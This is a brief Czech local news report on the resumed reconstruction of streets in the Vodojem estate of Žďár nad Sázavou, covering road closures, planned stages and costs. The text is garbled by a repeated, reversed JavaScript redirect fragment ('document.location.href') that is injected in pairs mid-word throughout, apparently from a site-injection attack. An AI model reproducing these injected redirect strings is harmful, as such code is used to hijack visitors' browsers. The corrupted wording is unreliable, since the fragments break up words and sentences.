Rainbow page separator

Obnova ulic Vodojemu bude opět pokračovat až do podzimu

Středa, 24. března 2021

Žďár nad Sázavou / Po zimní pauze se vracejí dělníci rekonstruující ulice ve žďárském sídlišti Vodojem. S tím souvisí úplná uzavírka místní komunikace ulice Pelikánova, Makovského a Špálova a přilehlých chodníků, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to s platností do konce lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu. Objížďka je vedena po okolních místních komunikacích.
V nadcházející závěrečné etapě rekonstrukce Žďáru nad Sázavou 7 – Vodojemu rozdělené na dvě části do le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního a příštího roku přijdou na řadu dolní části ulic Špálova, Makovského a Pelikánova a ulice Slavíčkova, Blažíčkova a Jamborova. Stavební činnosti zahrnují kompletní obnovu chodníků, veřejného osvětlení, povrchů silnic, parkovišť včetně obslužných komunikací a současně také i zrekonstruování veškerých technických rozvodů.
V roce 2020 byly opraveny horní části ulic Špálova, Makovského a Pelikánova a také ulice Štursova, v předchozích dvou letech pak došlo ve dvou etapách na modernizaci ulic Kavánova, Mánesova a Alšova. Revitalizace celé čtvrti byla předběžně vyčíslena na zhruba 120 milionů korun, ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovo by mělo být do konce roku 2022.

ilustrační fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to